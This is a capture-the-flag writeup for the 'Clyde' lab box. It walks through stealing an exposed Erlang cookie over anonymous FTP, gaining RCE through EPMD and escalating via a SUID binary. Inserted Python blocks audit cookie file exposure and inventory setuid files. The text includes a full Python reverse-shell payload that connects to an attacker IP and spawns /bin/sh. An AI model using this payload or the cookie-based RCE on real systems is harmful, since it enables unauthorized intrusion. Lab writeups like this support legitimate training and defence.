Clyde
Writeup for Clyde from offsec Proving Grounds
sudo ./nmapAutomator.sh 192.168.141.68 all
It doesn't look like there is much here, but we run gobuster either way to see if we find anything interesting.
Hmmm... seems like a dead end; let's see what else we can find on the other ports.
The Erlang Port Mapper Daemon (EPMD) coordinates distributed Erlang instances: it keeps track of which node name listens on which address.
A quick Google search shows that if we can obtain the authentication cookie from this machine, we can get RCE on the Erlang node. The cookie is stored in a file named .erlang.cookie, so we note that name down.
We try to log in using the default credentials guest:guest but are unsuccessful.
Since anonymous login is allowed, we can see what files are available here. We immediately notice the rabbitmq directory, which belongs to the application running on port 15672.
When we enter this directory and list its contents, we see the file .erlang.cookie, which can be used to gain RCE through the Erlang Port Mapper Daemon exploit.
We download .erlang.cookie to our attack machine.
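The root cause on this box is not EPMD itself but the cookie file: it is the only secret protecting node-to-node connections, and here a readable copy sat inside a directory served to anonymous users. The check below is an added example written for this writeup, not code from the box or from any tool mentioned on the page; it audits a cookie file for the three conditions that made this exposure possible (permissions other than 0400, a location inside an exported directory such as an anonymous FTP root, and a suspiciously short value). The paths, the `exported_roots` parameter and the sample cookie values are constructed for the demonstration.

```python
import os
import stat
import tempfile

# Added hardening check, not part of the original writeup. The Erlang cookie
# (.erlang.cookie) is the only secret protecting distributed-Erlang nodes
# reached through EPMD, so a readable copy is equivalent to RCE on the node.
# Expected on-disk state: mode 0400, owned by the service account, and stored
# nowhere that another service (such as an anonymous FTP root) can serve it.

DEFAULT_COOKIE_LEN = 20  # erl generates a 20-character random cookie by default


def audit_erlang_cookie(cookie_path, exported_roots=(), expected_uid=None):
    """Return a list of findings for the cookie file; an empty list means it looks sane."""
    findings = []
    try:
        st = os.stat(cookie_path)
    except FileNotFoundError:
        return ["cookie file missing: %s" % cookie_path]

    # 1. Permissions: anything other than owner-read-only is a finding.
    mode = stat.S_IMODE(st.st_mode)
    if mode != 0o400:
        findings.append("mode is %04o, expected 0400" % mode)
    if expected_uid is not None and st.st_uid != expected_uid:
        findings.append("owner uid %d, expected %d" % (st.st_uid, expected_uid))

    # 2. Location: the cookie must not live under a directory another service exports.
    real_path = os.path.realpath(cookie_path)
    for root in exported_roots:
        real_root = os.path.realpath(root)
        if os.path.commonpath([real_path, real_root]) == real_root:
            findings.append("cookie lives under exported directory %s" % root)

    # 3. Value: a hand-set short cookie is far weaker than the generated default.
    with open(cookie_path, "r") as fh:
        cookie = fh.read().strip()
    if len(cookie) < DEFAULT_COOKIE_LEN:
        findings.append("cookie is only %d characters (default is %d)"
                        % (len(cookie), DEFAULT_COOKIE_LEN))
    return findings


def demo():
    """Constructed scenario: a cookie dropped inside an anonymously served FTP root
    (the situation in the writeup), then the same cookie moved out and locked down.
    Returns (findings_for_exposed_copy, findings_for_hardened_copy)."""
    with tempfile.TemporaryDirectory() as tmp:
        ftp_root = os.path.join(tmp, "ftp")                      # constructed export root
        exposed = os.path.join(ftp_root, "rabbitmq", ".erlang.cookie")
        os.makedirs(os.path.dirname(exposed))
        with open(exposed, "w") as fh:
            fh.write("SHORTCOOKIE\n")          # constructed, deliberately weak value
        os.chmod(exposed, 0o644)               # world-readable: the exposed state
        bad = audit_erlang_cookie(exposed, exported_roots=[ftp_root],
                                  expected_uid=os.getuid())

        safe_dir = os.path.join(tmp, "var", "lib", "rabbitmq")   # constructed service home
        safe = os.path.join(safe_dir, ".erlang.cookie")
        os.makedirs(safe_dir)
        with open(safe, "w") as fh:
            fh.write("ABCDEFGHIJKLMNOPQRST\n")  # constructed 20-character placeholder
        os.chmod(safe, 0o400)
        good = audit_erlang_cookie(safe, exported_roots=[ftp_root],
                                   expected_uid=os.getuid())
    return bad, good


if __name__ == "__main__":
    exposed_findings, hardened_findings = demo()
    print("exposed cookie:", exposed_findings)
    print("hardened cookie:", hardened_findings)
```

Run against a real host, `exported_roots` would be the document roots of every anonymously reachable service (FTP, web, SMB), and `expected_uid` the uid of the account that runs the Erlang node; the exposed copy in the demo trips all three checks, the relocated 0400 copy trips none.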
First, we edit lines 22-24 of the script to specify the target and the cookie value. We can then change the CMD variable to any command we want.
We first check whether Python is present on the target so we can use it to get a reverse shell.
It seems Python is available, so we use it for the reverse shell. Note that the inner double quotes have to be escaped with a backslash, since the payload is itself wrapped in quotation marks.
Payload: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.141\",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
Running LinEnum on the target, we notice an interesting SUID file.
And we got root!
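The privilege escalation came from a setuid binary that LinEnum surfaced by simply enumerating the filesystem. The defensive counterpart is the same inventory run on a schedule and compared against an allow-list of binaries expected to carry the bit. The code below is an added example written for this writeup, not LinEnum's code or anything from the box; the directory layout, the `backup` file and the allow-list are constructed for the demonstration.

```python
import os
import stat
import tempfile

# Added SUID inventory check, not part of the original writeup. An attacker
# finds the escalation path by listing setuid files; a defender finds the same
# file first by diffing that list against what is supposed to be there.


def find_suid(root):
    """Return paths (relative to root) of regular files with the setuid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)            # lstat: never follow symlinks
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def unexpected_suid(root, allowlist):
    """Setuid files under root that are not on the allow-list."""
    allowed = set(allowlist)
    return [p for p in find_suid(root) if p not in allowed]


def demo():
    """Constructed filesystem: one expected setuid binary, one ordinary binary,
    and one stray setuid file under usr/local/bin. Returns (all_suid, unexpected)."""
    with tempfile.TemporaryDirectory() as tmp:
        layout = {
            "bin/ping": 0o4755,              # legitimately setuid
            "bin/ls": 0o755,                 # not setuid
            "usr/local/bin/backup": 0o4755,  # constructed stray setuid file
        }
        for rel, mode in layout.items():
            full = os.path.join(tmp, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write("#!/bin/sh\n")       # placeholder content, never executed
            os.chmod(full, mode)
        allow = {"bin/ping"}                 # constructed baseline for this layout
        return find_suid(tmp), unexpected_suid(tmp, allow)


if __name__ == "__main__":
    all_suid, stray = demo()
    print("setuid files:", all_suid)
    print("not on allow-list:", stray)
```

On a real host the allow-list is the package manager's record of which binaries ship with the setuid bit (or a snapshot taken at build time), and the scan root is `/`; any file that appears in `find_suid` but not in that baseline is the kind of finding that, on this box, handed over root.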